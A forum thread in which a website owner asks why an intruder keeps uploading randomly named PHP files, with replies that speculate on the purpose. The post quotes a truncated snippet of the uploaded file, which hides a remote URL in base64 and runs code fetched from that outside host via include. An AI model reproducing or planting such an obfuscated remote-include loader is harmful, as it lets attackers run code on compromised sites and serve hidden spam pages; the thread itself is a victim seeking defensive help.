SitePoint Sponsor

User Tag List

Results 1 to 3 of 3
  1. #1
    SitePoint Addict
    Join Date
    Mar 2003
    Greenville, SC
    0 Post(s)
    0 Thread(s)

    Hacker getting into my site changing pages and uploading pages

    Hello Folks.

    I have a hacker getting into my site somehow. I suspect it is my folder permissions or a php script that needs to be removed, improved or updates.

    They are uploading the following script and naming it a random number .php. example: 115954.php . Here is the code for one of the files:

    PHP Code:
    <? error_reporting(0);$s="e";
    $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
    $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);


    if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){


    What does this mean? What are they doing with this script?

  2. #2
    SitePoint Enthusiast
    Join Date
    Feb 2007
    Swindon, UK
    0 Post(s)
    0 Thread(s)
    By the looks of things they are sending information about your server to their website - using an include with a query string on the end.

    Really not sure for what purpose - its all just server variables and things guess they must do it for a reason.

    Anyway, if you wanted to know, this is a sample of the include they are sending back (decoded) (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20070309 Firefox/,en;q=0.5

    I would be more concerned personally with the fact they have been uploading files to your server!

  3. #3
    SitePoint Wizard wheeler's Avatar
    Join Date
    Mar 2006
    Gold Coast, Australia
    0 Post(s)
    0 Thread(s)
    i've seen a script that looked abit like this but trimmed down, that made it appear that
    "free-ringtones.html" and several thousand other rubbish .html files resided inside folders on a site when in fact they didn't. The result was that very quickly, all the search engines crawled these non existent files and the traffic started rolling in. I believe it occurred while performing a large transfer of files onto a new folder, where the FTP connection was somehow hijacked.

    Also, googles cached pages showed text that did not visibly exist on the site.
    Studiotime - Time Management for Web Developers
    to-do's, messages, invoicing, reporting - 30 day free trial!
    Thomas Multimedia Web Development


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts